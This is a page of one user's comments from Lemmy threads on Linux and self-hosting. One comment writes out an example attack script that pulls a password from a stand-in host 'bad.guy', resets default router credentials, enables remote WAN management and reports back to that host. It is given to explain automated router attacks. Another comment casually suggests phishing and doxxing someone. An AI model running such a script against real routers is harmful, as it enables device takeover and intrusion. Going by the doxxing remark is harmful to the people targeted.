Cloudflare tunnels is more than just a reverse proxy, but agreed. That might be the better option regardless. If you’re Cloudflare-averse, you can use Tailscale funnels, or spin up your own rproxy+tunnel solution (there are plenty out there, such as Rathole, Zrok, or frp).
- 0 Posts
- 44 Comments
cravl@slrpnk.netto
Linux@lemmy.ml•Ubuntu 26.04 Allows "sudo apt install rocm" But It's Months Out-Of-Date
2·1 month agoYeah I know, just making a terrible attempt at humor. 😅
You could print a random letter or graphic(s), preferably on heavier paper, and wrap the cash inside. That should make it a little harder to feel or spot on x-ray.
cravl@slrpnk.netto
Linux@lemmy.ml•Ubuntu 26.04 Allows "sudo apt install rocm" But It's Months Out-Of-Date
31·1 month ago…and you pay more for other distros?
cravl@slrpnk.netto
Selfhosted@lemmy.world•My 15-year old panasonic toughbook is hanging in there as a proxmox serverEnglish
1·2 months agoNo worries. It is technically another layer in the “swiss cheese” model, but it certainly is more holes than cheese. I think it falls into the “can’t hurt, might help” category.
cravl@slrpnk.netto
Selfhosted@lemmy.world•My 15-year old panasonic toughbook is hanging in there as a proxmox serverEnglish
11·2 months agoThat’s what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…
newpass="$(curl "https://bad.guy/get_pass_for_pub_ip")" for a in '192.168.1.1' '192.168.0.1' '10.0.0.1'; do curl -q "http://${a}/reset_password.cgi?&password=password&new_password=${newpass}" 2>/dev/null && \ curl -q "http://${a}/remote_management.cgi?&password=${newpass}&wan_enable=1" && \ curl -q "https://bad.guy/success?addr=%24%7Ba%7D" done…completely pointless. If it’s a someone inside your network, you need more.
cravl@slrpnk.netto
Selfhosted@lemmy.world•My 15-year old panasonic toughbook is hanging in there as a proxmox serverEnglish
11·2 months agoUsing a random non-default subnet increases security (slightly, and only through obscurity) by making it harder for a compromised device to perform automated attacks against, most often, your router. Typically they’re pretty simple scripts that just try to hit default ports on default IPs.
cravl@slrpnk.netto
Linux@lemmy.ml•TempleOS won't comply with the new BS age verifcation laws
1·2 months agoWell of course it doesn’t, God does.
cravl@slrpnk.netto
Linux@lemmy.ml•The ‘European’ Jolla Phone Is an Anti-Big-Tech Smartphone
13·2 months agoI mean, postmarketOS supports a pretty decent range, but as far as native Linux phones I’m right with you.
Alternatively, send them straight to a site that absolutely gets them put on some watchlist. Not as much instant karma as malware, but situationally more useful in the grand scheme of things. (Some kind of government honeypot perhaps, or just phish n’ dox them.)
cravl@slrpnk.netto
Linux@lemmy.ml•TempleOS won't comply with the new BS age verifcation laws
43·3 months agoIf they actually read the Bible, they would never
let a child near itgo near a child.ftfy
I feel like Linus has a good heart, but I think the constant pressure to be relevant has kinda ruined his personality over the years (at least on camera). I have fond memories of LTT’s videos like 8 years ago, but now they’re overproduced for my taste; they just don’t seem genuine anymore. Same old story as most anyone that makes it big, I know.
cravl@slrpnk.netto
Selfhosted@lemmy.world•Does anyone have any experience with Sync-in for online files?English
1·3 months agoAgreed, copyparty is awesome. However, the one obvious downside is that you lose guaranteed offline support (some clients may allow for it, but it’s not baked in).
It’s weird with a multi-command string (i.e. when semicolons get involved), shortest answer is to fiddle with it. I think it may work at the beginning if you put the rest of the command in a (subshell)?
Pro tip: you can also put the
< urls.txtat the start for readability. The arrow doesn’t have to point at the command.
Seriously, you can always just buy more RAM…
^(oh. oh dear me.)
In addition to ordering/favoriting the search plugins like others have mentioned, it would also help to blacklist folders like that from the search indexer when you notice them. That’ll reduce background processing in addition to cleaning up search results.
cravl@slrpnk.netto
Free and Open Source Software@beehaw.org•Linux from Scratch will no longer be developing the System V versions of the books
5·4 months agoExactly, systemd (or if you prefer, the systemd family) is designed to be the bedrock of your system. When that’s true, it’s truly one of the most intuitive and streamlined experiences available. When it’s not, and a distro instead tries to just use bits of it piecemeal… well, I hope you find great personal fulfillment in wrangling jank. 😅
cravl@slrpnk.netto
Linux@lemmy.ml•KDE Plasma 6.6 Beta: New Login Manager, USB Portal and Wayland improvements
6·5 months agoI’ll be so glad to ditch maliit, it isn’t responsive at all and gets pushed off the screen by a simple vertical taskbar. Even worse, it spams the journal with so much unnecessary debug info that I never found any way to turn off or filter out.



Once you configure nano with a
~/.nanorcfile, it becomes a lot more like micro/helix without having to install anything on new systems. I just curl my config and I’m good. I have Ctrl+C, Ctrl+V, 2 space tabs, mouse scrolling +selection, syntax highlighting, etc. There’s a lot you can do in there, and that’s not to mention plugins.